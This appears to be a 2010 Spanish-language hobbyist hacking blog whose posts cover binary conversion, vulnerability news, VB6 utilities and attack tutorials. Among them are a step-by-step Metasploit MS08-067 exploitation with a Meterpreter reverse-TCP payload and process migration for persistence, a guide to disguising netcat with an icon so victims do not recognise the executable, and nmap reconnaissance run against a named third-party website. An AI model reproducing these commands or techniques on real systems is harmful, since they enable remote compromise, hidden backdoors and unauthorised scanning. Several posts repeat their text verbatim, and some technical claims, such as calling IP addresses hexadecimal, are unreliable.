Hola gente, les quiero comentar que mude el blog a otra direccion, pueden visitarnos en:
http://www.bbischol.blogspot.com
Este tiene una nueva inovacion en cuanto al diseño la tematica y un par de agregados como proyectos y cosas asi en las cuales participo ... Saludos
Dr [F]
jueves, 29 de julio de 2010
martes, 30 de marzo de 2010
Mi cumpleaños
Hola estimados leectores (;P), hacia este post para comentarles que ayer (29 de marzo) fue mi cumpleaños...
Naci el 29/3/1994 a los 15 años nacio mi interes por todo este mundo (lo cual no me arrepiento) :P y supongo que mis conocimientos han hido creciendo y espero que sigan creciendo aun mas hasta llegar al infinito...
Bueno, el fin de este POST es que sepan un poco mas de mi..
Bueno hasta luego...
Pd: Cualquier duda del tuto de pasar de decimal a binario y vicersa preguntar por mensaje o cualquier cosa mandar al mail...
[W]oomD >>
Secciones:
Cumpleaños
lunes, 29 de marzo de 2010
Pasar de binario a decimal y viceversa
Hola, hoy les traigo un tutorial de como convertir numeros de Decimal a Binario y de decimal a binario
Antes de que leean este tutorial, deben tener conocimientos previos ("unidades" como pueden ser:
Bit, bytes,megabyte,kilobyte,gigabyte,terabyte,etc)
Aca les dejo un mini resumen...
Esto sirve de mucho ya que los ordenadores interactuan entre si con numeros binarios ( 0 y 1)
IP: Protocolo de internet (Internet Protocol) se encarga del direccionamiento de datos, sabe de donde viene y hace donde va un archivo/dato determinado
Es un numero logico que identifica de una manera logica y jerarquica un equipo conectado a internet.
Una direccion IP como nosotros las conocemos, esta compuesta por numeros Hexadecimales como puede ser
201.222.223.123
Pero para las computadoras no son mas que una agrupacion (octeto) de ceros y unos, lo que pretende este texto es enseñarle al leector como pasar esos numeros a ceros y unos y viceversa, comenzemos:
Bueno, esto es muy sencillo
Lo unico que deben saber es:
Dividir,Ordenar, nada mas :P miren:
tenemos este numero: 50 y lo queremos pasar a codigo binario ¿Como hacemos?
Bueno dividimos a 50 por 2 nos da 25 y resto 0 ¿No es asi?
Podriamos decir que el resto nos da nuesta "parte" del numero en binario
Explico: a 50 lo dividimos por 2 nos da resto cero, 50:2 = 25
25 : 2
04 12
1
25: 2 nos da resto 1 y nos da como resultado 12, 12:2 = 6 (resto 0), 6: 2 = 3 resto 0, 3:2 = 1 resto 1, cuando te queda 1 al final, siempre queda resto 1
Se divide por 2 hasta que el numero quede menor a 1...
3 :2
-2 1
1
un ejemplo:
numero: 300
300 150 75 37 18 9 4 2 1
0 0 1 1 0 1 0 0 1
con ordenarlo me referia a que vaya de derecha a izq asi:
Decimal Binario
300 = 100101100
veamos otro ejemplo:
numero: 750
750 375 187 93 46 23 11 5 2 1
0 1 1 1 0 1 1 1 0 1
750 = 1011101110
¿Se entendio?
cualquier duda preguntar al msn o en el mismo blog
Para realizar esta operación usaremos el método de potencias, así que obviamente debemos saber y entender potencias.
En este caso las potencias se utilizan de base 2, con exponente par desde el cero (0), hasta donde podamos llegar por cada cifra correspondiente a la transformación, luego se debe multiplicar por el número binario correspondiente a cada cifra (0 o 1), y finalmente sumar los resultados.
siguiendo con el ejemplo anterior:
750 = 1011101110
0 = 2^0 = 1
1= 2^1 = 2
1= 2^2 = 4
1= 2^3 = 8
0 =2^4 = 16
1 =2^5 = 32
1=2^6 = 64
1=2^7 = 128
0=2^8 = 256
1=2^9 =512
finalmente solo se suman los numeros 1 ej;
2+4+8+32+64+128+512 = 750
tarann.... ! nos dio el mismo numero que antes ... Woow :P
Bueno, eso fue todo
PD1: Este tutorial, fue realizado a las 4:07 de la madrugada.. sean considerados con los comentarios o con las quejas...:D
Bye
Antes de que leean este tutorial, deben tener conocimientos previos ("unidades" como pueden ser:
Bit, bytes,megabyte,kilobyte,gigabyte,terabyte,etc)
Aca les dejo un mini resumen...
- Bit => Un bit representa un cero y un uno (0 y 1), se denota “b”
- Nibble => Es equivalente a 4 bits, se denota “N”
- Byte => Es equivalente a 8 bits, se denota “B”
- Kilobyte => Es equivalente a 1024 bytes, se denota “KB”
- Megabyte => Es equivalente a 1024 KB, se denota “MB”
- Gigabyte => Es equivalente a 1024 MB, se denota “GB”
- Terabyte => Es equivalente a 1024 GB, se denota “TB”
- Pentabyte => Es equivalente a 1024 TB, se denota “PB”
- Exabyte => Es equivalente a 1024 PB, se denota “EB”
- Zettabyte => Es equivalente a 1024 EB, se denota “ZB”
- Yottabyte => Es equivalente a 1024 ZB, se denota “YB”
- Brontobyte => Es equivalente a 1024 YB, se denota “BB”
Esto sirve de mucho ya que los ordenadores interactuan entre si con numeros binarios ( 0 y 1)
IP: Protocolo de internet (Internet Protocol) se encarga del direccionamiento de datos, sabe de donde viene y hace donde va un archivo/dato determinado
¿Que es una IP?
Es un numero logico que identifica de una manera logica y jerarquica un equipo conectado a internet.
Una direccion IP como nosotros las conocemos, esta compuesta por numeros Hexadecimales como puede ser
201.222.223.123
Pero para las computadoras no son mas que una agrupacion (octeto) de ceros y unos, lo que pretende este texto es enseñarle al leector como pasar esos numeros a ceros y unos y viceversa, comenzemos:
Decimal A binario:
Bueno, esto es muy sencillo
Lo unico que deben saber es:
Dividir,Ordenar, nada mas :P miren:
tenemos este numero: 50 y lo queremos pasar a codigo binario ¿Como hacemos?
Bueno dividimos a 50 por 2 nos da 25 y resto 0 ¿No es asi?
Podriamos decir que el resto nos da nuesta "parte" del numero en binario
numero 50 25 12 6 3 1
resto 0 1 0 0 1 1
resto 0 1 0 0 1 1
Explico: a 50 lo dividimos por 2 nos da resto cero, 50:2 = 25
25 : 2
04 12
1
25: 2 nos da resto 1 y nos da como resultado 12, 12:2 = 6 (resto 0), 6: 2 = 3 resto 0, 3:2 = 1 resto 1, cuando te queda 1 al final, siempre queda resto 1
Se divide por 2 hasta que el numero quede menor a 1...
3 :2
-2 1
1
un ejemplo:
numero: 300
300 150 75 37 18 9 4 2 1
0 0 1 1 0 1 0 0 1
con ordenarlo me referia a que vaya de derecha a izq asi:
Decimal Binario
300 = 100101100
veamos otro ejemplo:
numero: 750
750 375 187 93 46 23 11 5 2 1
0 1 1 1 0 1 1 1 0 1
750 = 1011101110
¿Se entendio?
Pasando de Binario a decimal
Para realizar esta operación usaremos el método de potencias, así que obviamente debemos saber y entender potencias.
En este caso las potencias se utilizan de base 2, con exponente par desde el cero (0), hasta donde podamos llegar por cada cifra correspondiente a la transformación, luego se debe multiplicar por el número binario correspondiente a cada cifra (0 o 1), y finalmente sumar los resultados.
siguiendo con el ejemplo anterior:
750 = 1011101110
0 = 2^0 = 1
1= 2^1 = 2
1= 2^2 = 4
1= 2^3 = 8
0 =2^4 = 16
1 =2^5 = 32
1=2^6 = 64
1=2^7 = 128
0=2^8 = 256
1=2^9 =512
finalmente solo se suman los numeros 1 ej;
2+4+8+32+64+128+512 = 750
tarann.... ! nos dio el mismo numero que antes ... Woow :P
Bueno, eso fue todo
By Woomd...
PD1: Este tutorial, fue realizado a las 4:07 de la madrugada.. sean considerados con los comentarios o con las quejas...:D
Bye
Secciones:
Binario,
Decimal,
Ingenieria Inversa,
IP,
Redes
jueves, 25 de marzo de 2010
Multiples Vulnerabilidades en google Chrome
Se han anunciado un total de nueve vulnerabilidades en Google Chrome, el navegador de Google. Un atacante remoto podría emplear estos problemas para evitar restricciones de seguridad, descubrir información sensible o comprometer un sistema vulnerable.
El primer problema se debe a errores de punteros en la sandbox mientras que otro problema se debe a metadatos persistentes como Web Databases y STS. Más problemas se dan porque las cabeceras http se procesan antes de la comprobación de navegación segura (SafeBrowsing).
Una vulnerabilidad de ejecución remota de código se produce al procesar SVG mal construidos. Otro problema de desbordamiento de entero en objetos JavaScript WebKit, también podría emplearse para ejecutar código arbitrario.
Otros problemas están relacionado con los diálogos de autenticación http básica y de descargas. Una última vulnerabilidad reside en el tratamiento de elementos SVG vacíos.
Se recomienda actualizar a Google Chrome versión 4.1.249.1036, disponible
Fuente http://www.foro.portalhacker.net
Secciones:
Bugs y Exploits,
Google Chrome,
Noticias,
Seguridad
lunes, 22 de marzo de 2010
Disfrasando a NetCat con cualquier Icono
Hola, aca denuevo.
En esta oportunidad, voy a hacer un tutorial de como disfrasar netcat con cualquier iconito para que no parezca un .exe comun y corriente.
NetCat
ResHacker
Pack De Iconos
descargar netcat -----> http://www.megaupload.com/?d=Z1AMQA1T
descargar RESHACKER -----> http://www.megaupload.com/?d=R1O50T2P
Descargar pack iconos -----> http://img191.imageshack.us/img191/7816/55142341.jpg
En esta oportunidad, voy a hacer un tutorial de como disfrasar netcat con cualquier iconito para que no parezca un .exe comun y corriente.
Materiales Necesarios:
NetCat
ResHacker
Pack De Iconos
descargar netcat -----> http://www.megaupload.com/?d=Z1AMQA1T
descargar RESHACKER -----> http://www.megaupload.com/?d=R1O50T2P
Descargar pack iconos -----> http://img191.imageshack.us/img191/7816/55142341.jpg
Bueno comenzemos con este tutorial :D
Primero, voy a explicar como hacer todo detalladamente y luego, colgare algunas screens paso por paso de como se realiza.
En primer lugar abres el ResHacker y le das en File/Open y buscas el nc(netcat). Después pinchas en acción y luego en Add a new Resource, luego se verá la ventana que ves a la derecha y presionas donde dice “Open file with new resource” (paso 3) para buscar el icono que teniamos, luego donde dice “Resource Name” Debes escribir la palabra “ICON” tal como se ve en la foto y para finalizar presionamos en “Add Resource” y en “File/Save”. Con todo esto te creará un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar la pantalla (F5) veras que el netcat tiene el icono de
Paso 2: renombramos nc.exe y desde ahora se llamará “loquequieras.exe” XD, luego pinchas el netcat con el botón derecho de tu Mouse y deberá aparecer algo así (obviamente después de haber instalado el winrar.)
Screens:
2)
By [W]oomD >>
viernes, 19 de marzo de 2010
XSS en Web Site
Hola, me tope hoy con una web vulnerable a XSS y como estaba aburrido decidi postearlo:
¿Que es XSS? (SEGUN WIKI)
Su nombre original es "Cross Site Scripting", y es abreviado como XSS para no ser confundido con las siglas CSS, Hojas de estilo) Las vulnerabilidades de XSS originalmente abarcaban cualquier ataque que permitiera ejecutar código de "scripting", como VBScript o Javascript, en el contexto de otro sitio web (y recientemente esto se podría clasificar más correctamente como "distintos orígenes").
Estos errores se pueden encontrar en cualquier aplicación que tenga como objetivo final, el presentar la información en un navegador web No se limita solamente a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en sí. El problema está en que usualmente no se validan correctamente los datos de entrada que son usados en cierta aplicación. Esta vulnerabilidad puede estar presente de forma directa (también llamada persistente) o indirecta (también llamada reflejada).
Directa (Persistente): este tipo de XSS comúnmente filtrado, y consiste en invadir código HTML peligroso en sitios que así lo permiten
Indirecta (Reflejada): este tipo de XSS consiste en modificar valores que la aplicacion web utiliza para pasar variables entre dos páginas, sin usar sesiones y sucede cuando hay un mensaje o una ruta en la URL del navegador, en una cookie, o cualquier otra cabecera HTTP (en algunos navegadores y aplicaciones web, esto podría extenderse al DOM del navegador).
Cookie: Fragmento de informacion que se almacena en el disco duro del visitante de una pagina web a traves de su navegador.
Usos mas frecuentas de Cookies:
Cuando un user ingresa un usuario y contraseña en una web, la cookie almacena los datos asi no tiene que andar escribiendola dia y noche :P
Conseguir Info sobre los datos de navegacion del user
Bueno, aca dejo la screen:
Aclaro, que este tutorial, fue una introduccion a XSS, todavia me falta aprender a mi PHP, asi que todavia no prefiero meterme con WebHacking.. excepto con SqLi xD
NoS VeMoS Dr [F]
Secciones:
Bugs y Exploits,
XSS
domingo, 14 de marzo de 2010
MetaSploit FrameWork 3.3
Hola, este tutorial, es para gente que ya tenga instalado el metasploit framework en su computadora y que sepa el manejo basico de este Soft.
primero:
Se trata de una vulnerabilidad para la ejecución remota de código. Un atacante que aprovechara esta vulnerabilidad podría tomar el control completo de un sistema afectado de forma remota. En los sistemas basados en Microsoft Windows 2000, Windows XP y Windows Server 2003, un atacante podría aprovechar esta vulnerabilidad sobre RPC sin autenticación y ejecutar código arbitrario. Si falla el intento de aprovecharse de esta vulnerabilidad, también podría dar lugar a un bloqueo en Svchost.exe. Si se produce dicho bloqueo, afectará al servicio del servidor. El servicio del servidor proporciona compatibilidad con el uso compartido de archivos, impresoras y canalizaciones con nombre a través de la red.
La causa de esta vulnerabilidad es el servicio del servidor, que no controla correctamente las solicitudes de RPC especialmente elaboradas para ello.
Aca dejo (en forma entera) como explotar la vulnerabilidad y mas abajo lo detallare con fotos.
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.103
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.105
exploit
y listo ya ingresamos
Bueno Comenzemos explotando la vulnerabilidad:
Bueno, en primera instancia, vemos la pantalla del Meta Sploit Framework 3.3 actualizado.
Aca cargamos el exploit:
use exploit/windows/smb/ms8_067_netapi
show options
set RHOST 192.168.1.103
vemos las opciones que nos pide y configuramos el pc a atacar
configuramos el host REMOTO: ip
Despues de cargar el HOST remoto, cargo el Payload .
en mi caso
set payload windows/meterpreter/reverse_tcp
lo que hago es que se conecte el host a mi , util en caso de tener un firewall bloqueando conexiones entrantes
y le digo a que maquina quiero que se conecte meterpreter
set LHOST 192.168.1.101
uso el comando exploit para empezar a explotar la vulnerabilidad
Aca esta creando la sesion meterpreter
Sesion meterpreter abierta...
Con el comando ps veo la lista de procesos
y ahora migramos a un proceso que sabemos que no se va a terminar conclusion, podemos estar en la pc el tiempo que querramos, mientras no se reinicie el PC.xD
Y ahora migramos a otro proceso el nombre a migrar del procesos
ej: migrate PID
¿se ve ?
migrate 728 que es el proceso del freeze en el ciber :D
y ahora abrire una shell i comprobare que es la Ip 192.168.1.103
Bueno, antes que nada, este tutorial fue hecho en un ciber con el consentimiento del administrador, que estubo en todo momento detras de MI :D
primero:
¿De que se trata la vulnerabilidad MS08_067_NETAPI?
Se trata de una vulnerabilidad para la ejecución remota de código. Un atacante que aprovechara esta vulnerabilidad podría tomar el control completo de un sistema afectado de forma remota. En los sistemas basados en Microsoft Windows 2000, Windows XP y Windows Server 2003, un atacante podría aprovechar esta vulnerabilidad sobre RPC sin autenticación y ejecutar código arbitrario. Si falla el intento de aprovecharse de esta vulnerabilidad, también podría dar lugar a un bloqueo en Svchost.exe. Si se produce dicho bloqueo, afectará al servicio del servidor. El servicio del servidor proporciona compatibilidad con el uso compartido de archivos, impresoras y canalizaciones con nombre a través de la red.
La causa de esta vulnerabilidad es el servicio del servidor, que no controla correctamente las solicitudes de RPC especialmente elaboradas para ello.
Aca dejo (en forma entera) como explotar la vulnerabilidad y mas abajo lo detallare con fotos.
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.103
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.105
exploit
y listo ya ingresamos
Bueno Comenzemos explotando la vulnerabilidad:
Bueno, en primera instancia, vemos la pantalla del Meta Sploit Framework 3.3 actualizado.
Aca cargamos el exploit:
use exploit/windows/smb/ms8_067_netapi
show options
set RHOST 192.168.1.103
vemos las opciones que nos pide y configuramos el pc a atacar
configuramos el host REMOTO: ip
Despues de cargar el HOST remoto, cargo el Payload .
en mi caso
set payload windows/meterpreter/reverse_tcp
lo que hago es que se conecte el host a mi , util en caso de tener un firewall bloqueando conexiones entrantes
y le digo a que maquina quiero que se conecte meterpreter
set LHOST 192.168.1.101
uso el comando exploit para empezar a explotar la vulnerabilidad
Aca esta creando la sesion meterpreter
Sesion meterpreter abierta...
Con el comando ps veo la lista de procesos
y ahora migramos a un proceso que sabemos que no se va a terminar conclusion, podemos estar en la pc el tiempo que querramos, mientras no se reinicie el PC.xD
Y ahora migramos a otro proceso el nombre a migrar del procesos
ej: migrate PID
¿se ve ?
migrate 728 que es el proceso del freeze en el ciber :D
y ahora abrire una shell i comprobare que es la Ip 192.168.1.103
Bueno, antes que nada, este tutorial fue hecho en un ciber con el consentimiento del administrador, que estubo en todo momento detras de MI :D
Tutorial By Dr [F]
Secciones:
Bugs y Exploits,
MetaSploit,
Windows
sábado, 13 de marzo de 2010
Microsoft me rio de la seguridad
Bueno, aca dejo algo que me intereso mucho cuando lo vi, y advierto a cualquier usuario (depaso)
Fuente: Expansión.com
Fuente: Expansión.com
Microsoft alerta sobre el peligro de pulsar F1
"La compañía Microsoft alerta a sus usuarios de Windows XP sobre el peligro de hacer caso a los sitios web que les solicitan que pulsen la tecla de ayuda'F1', ya que, de hacerlo, podrían sufrir graves problemas de seguridad.
En un aviso de seguridad publicado esta semana -después de que el investigador polaco Maurycy Prodeus revelara el fallo el viernes- Microsoft explicó que existe una vulnerabilidad de VBScript que podría hacer que algunos sitios web logren hacerse con el control de ordenadores de extraños sin que medie el consentimiento del propietario.
Según recoge 'ComputerWorld', en el mismo comunicado Microsoft ofrecía algunos consejos sobre cómo proteger los ordenadores hasta que el parche de seguridad fuera enviado. "La vulnerabilidad se encuentra en la forma en la que VBScrip interactúa con los archivos de Ayuda de IE. Si un sitio web malicioso muestra un cuadro de diálogo especialmente diseñado y el usuario pulsa la tecla 'F1', código arbitrario podría ser ejecutado en el contexto de seguridad del usuario", explica el comunicado de seguridad.
Esta vulnerabilidad afecta a ordenadores con sistemas operativos Windows 2000, Windows Server 2003 y Windows XP con el navegador Internet Explorer.
Hasta que no este preparado el parche de seguridad, Microsoft ha aconsejado a sus usuarios que no pulsen F1 cuando un sitio web se lo solicite. Además, los usuarios pueden proteger sus ordenadores desactivando la ayuda de Windows.
Según publica 'Computer World', un alto directivo del Microsoft Security Response Center (MSRC), Jerry Bryant, aseguró en un e-mail que la compañía "está preocupada porque esta vulnerabilidad no fuera revelada de una manera responsable, lo que podría poner en riesgo a los clientes".
Bryan afirmó que Microsoft no ha fijado un calendario para una revisión, y sólo dijo que "Microsoft tomará medidas apropiadas para ayudar a proteger a sus clientes"
Lo mas gracioso de esto, es que MICROSOFT no catalogo la vulnerabilidad como critica porque segun Ellos, el atacante tiene que avisar a la victima que tiene que pulsar una tecla -.-
Saluudos
Dr [F]
Secciones:
Bugs y Exploits,
Microsoft
Manage Folders 0.1 xD
Hola, les dejo aca mi nuevo "invento" :P lo hize cuando estaba aburrido
Lo que hace este programita, encripta una carpeta y cuando se cambia de usuario, el otro no la podra abrir....
esta bueno no ?
:P
dejo el code y el .exe
Code
Lo que hace este programita, encripta una carpeta y cuando se cambia de usuario, el otro no la podra abrir....
esta bueno no ?
:P
dejo el code y el .exe
Code
Option Explicit 'obligo a declrar las variables
Dim sisisi As Boolean ' declaro una variable con valo booleano
Dim ruta As String 'declaro una variable ruta con valor de cadnea
Dim sisisi2 As Boolean 'declaro la variable sisisi2 con valor booleano
Dim rut33 As String 'etc
Private Declare Function AnimateWindow Lib "user32" ( _
ByVal hwnd As Long, _
ByVal dwTime As Long, _
ByVal dwFlags As Long) As Long 'declaro la api animatewindow
REM hwnd se aplica a la ventana que quiero aplicar el efecto
rem dwtime es el tiempo en el que sucedera la accion (en milisegundos)
rem dwflags son los valores que permiten indicar que efecto usar y otras propiedades como la orientación del efecto, es decir que vaya apareciendo desde el medio , del lado izq al derecho con efecto fade o transparencia, etc
Private Const AW_ACTIVATE = &H20000 'constante que indica que despues se active la ventana
Private Const AW_BLEND = &H80000 ' constante que indica la transparencia
Private Declare Function EncryptFile Lib "ADVAPI32" Alias "EncryptFileA" ( _
ByVal lpfilename As String) As Boolean 'declaro api para encriptar archivos
Private Declare Function DecryptFile Lib "ADVAPI32" Alias "DecryptFileA" ( _
ByVal lpfilename As String, _
ByVal dwreserved As Long) As Long 'api para desencriptar archivos
Public Function encriptar_archivos(ByVal ruta1 As String) As Boolean 'declaro una funcion con la variable ruta1
encriptar_archivos = EncryptFile(ruta1) 'digo que la funcion sea = a la api
End Function
Public Function desencriptar_archivos(ByVal ruta2 As String) As Boolean 'declaro funcion y la var ruta2
desencriptar_archivos = DecryptFile(ruta2, 0) 'digo que la funcion sea = a la api pero esta vez con la opearcion inversa (0)
End Function
Private Sub command1_click() 'al hacer click
ruta = InputBox("Ruta del Archivo a encriptar: ", "By Dr [F]", "Aca") ' digo que la variable ruta sea el inputbox
sisisi = encriptar_archivos(ruta) 'sisisi = se aplica la funcion desencriptar en la ruta
If sisisi Then ' si sisisi nada entonces
MsgBox "Archivos Encriptado Satisfactoriamente", vbInformation, "Good" 'este mensaje
Else ' de lo contrario
MsgBox Err.Description 'el error que haya sucedido
End If
End Sub
Private Sub command2_click()
rut33 = InputBox("Ruta del Archivo a desencriptar: ", "By Dr [F]", "Aca")
sisisi2 = desencriptar_archivos(rut33)
If sisisi2 Then
MsgBox "Archivos desencriptado satisfactoriamente", vbInformation, "Good"
Else
MsgBox Err.Description, vbCritical, "Error"
End If
Rem lo mismo
End Sub
Private Sub form_load()
Me.Caption = "Manage Folder v 0.1 xD"
Dim lala As Long
lala = AnimateWindow(Me.hwnd, 700, AW_BLEND Or AW_ACTIVATE)
Command1.Caption = "Encriptar"
Command2.Caption = "Desencriptar"
Command1.BackColor = vbGreen
Command2.BackColor = vbGreen
End Sub
Aca dejo el .exe no tengo ganas de analizarlo ... analisenlo uds, asi depaso se acostumbran
lo pueden analisar aca:
.exe:
By Dr [F]
Secciones:
File Manager,
Programacion,
VB6
Contador de Lineas
Bueno, aca les dejo mi contador de Lineas en visual basic 6, este programa es muy facil de usar y sencillo, adicto a los contadores de las lineas de los codes :P
Aca ----------> programa contadirlineas.exe
Aca ---------> Codigo.. viene en un .txt
Analisis con Novirus thanks para los desconfiados -.-
Aca ----------> programa contadirlineas.exe
Aca ---------> Codigo.. viene en un .txt
Analisis con Novirus thanks para los desconfiados -.-
Report date: | 2010-03-13 15:50:35 (GMT 1) |
File name: | Contadorlineas.exe |
File size: | 20480 bytes |
MD5 hash: | 82aae17fbfe11d2079622221fdd98536 |
SHA1 hash: | 5cd72b84fbf9fd0f586d1cae9bb7b66a1eec9733 |
Detection rate: | 0 on 21 (0%) |
Status: | CLEAN |
Antivirus | Database | Engine | Result |
---|---|---|---|
a-squared | 13/03/2010 | 4.5.0.8 | - |
Avast | 100313-0 | 4.8.1368 | - |
AVG | 271.1.1/2720 | 9.0.0.725 | - |
Avira AntiVir | 7.10.4.188 | 7.6.0.59 | - |
BitDefender | 13/03/2010 | 7.0.0.2555 | - |
ClamAV | 03/03/2010 | 0.95.3 | - |
Comodo | 3468 | 3.13.579 | - |
Dr.Web | 13/03/2010 | 5.0 | - |
Ewido | 13/03/2010 | - | - |
F-PROT6 | 20100312 | 6.3.3.4884 | - |
G-Data | 19.9309 | 2.0.7309.847 | - |
Ikarus T3 | 03/03/2010 | 1001074 | - |
Kaspersky | 13/03/2010 | 9.0.0.736 | - |
McAfee | 03/03/2010 | 5.1.0.0 | - |
NOD32 | 4940 | 4.0.474 | - |
Panda | 02/03/2010 | 9.5.2 | - |
Solo | 13/03/2010 | 8.0 | - |
TrendMicro | 887(688700) | 1.1-1001 | - |
VBA32 | 13/03/2010 | 3.12.12.2 | - |
VirusBuster | 1.5.5.0 | - | |
Zoner | 13/03/2010 | 0.2 | - |
Secciones:
Descargas,
Programacion,
VB6
viernes, 12 de marzo de 2010
Escanear Objetivo Con Nmap
Hola, en esta oportunidad, les enseñare a hacer una exploracion del sistema que estemos por atacar con nuestro querido NMAP...
Primero un poco de definicion:
¿Que es Nmap?
Nmap es un programa de code abierto que sirve para efectuar rastro de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.
Fuente Wikipedia
PD: Aclaro que para entender un poco mas del NMAP, es necesario comprender basicamente el PROTOCOLO TCP/IP Y algo de REDES, en el blog hay muy buena info.
Bueno, empezemos...
Lo unico que necesitaremos, sera el nmap que lo podremos conseguir aqui:
http://download.insecure.org/nmap/dist/nmap-4.20-setup.exe
Lo instalamos en el Disco Raiz
Bueno cuando este todo listo, nos dirigiremos a nuestra preciada consola de comandos:
Bueno, lo primero que haremos con nuestro NMAP, sera realizar un tipo de escaneo basico a una web objetivo (la que quieran). yo por mi parte se lo hare a www.pasionverdolaga.com.ar
Con este tipo de escaneo:
nmap
nos saldran los puertos abiertos que tiene el servidor en que se aloja la web
¿Ven ?
Ahora con la opcion -O del nmap, podremos saber o estar casi seguros del Sistema Operativo que utiliza nuestra victima, y ademas nos dara los puertos abiertos.
nmap -O o nmap -O
Miremos la informacio que nos tira.
Nos dice que es probable que el sistema operativo sea Linux 92% seguro , vemos las versiones de LINUX..
Tambien vemos que por el medio hay un router y un firewall. esto es medio dificil de enteder, pero se aprende leyendo :D
Con el comando -sT, veremos, si la IP es dinamica o no...
ejecutamos...
nmap -sT o nmap -sT
y vemos si es dinamica o estatica
Despues podemos ver los servicios que corren en la web con el comando -sV
ponemos
nmap -sV www.web.com.ar
Ahi vemos la version del FTP: PROFTPD... si tubiera algun otro servicio corriendo bajo algun programa apareceria la version, esto es muy util a la hora de hacer, buscar exploits.
Si el destino, tiene un Firewall, que no acpeta peticiones entrantes (que bloquea pings) tendremos que usar la opcion -P0 asi nuestro escaneo no manda PINGS al destino.
ej:
nmap -P0 -O -Sv www.web.com.ar
Ese seria un escaneo completo, ya que en caso de que bloqueara los pings, estariamos evadiendo el firewall, estariamos escaneando el sistema operativo, y los servicios que corren en el...
Probemos:
Vemos un router linksys... y nmap nos dice que es un SO Unix... (muchos bugs :P)
Tambien podemos decirle a nmap que agregue mas informacion, con el modo verbose -vv (se acordaran de ncat :P)
esto se usa asi:
nmap -O -sV -vv www.web.com.ar
Como vemos nos da mucha mas info, pero lamentablemente, a mi no me entro en la pantalla :P
Bueno, ahora no pondre mas fotos, porque creo que si sigo asi le voi a hacer overflow a imageshack.us :P
sigamos con algunos comandos para escanear redes... LAN
nmap -sV 192.168.0.1-254 -P0 -vv -p1 - 25000
Con ese comando le estamos diciendo a nmap, que nos de informacion de los servicios de el rango de red 192.168.0.1 al 192.168.0.254. Que agrege info con vv y que recorra los puertos del 1 al 25000
Bueno, eso es todo por hoy, si quieren saber mas comandos del NMAP vasta con ir a la consola y poner
nmap y darle a enter, saldran una lista de comandos.
Listo lala....
PD: 100% echo por mi
Saluda: Dr [F]
Secciones:
Hacking Basico,
Nmap
Suscribirse a:
Entradas (Atom)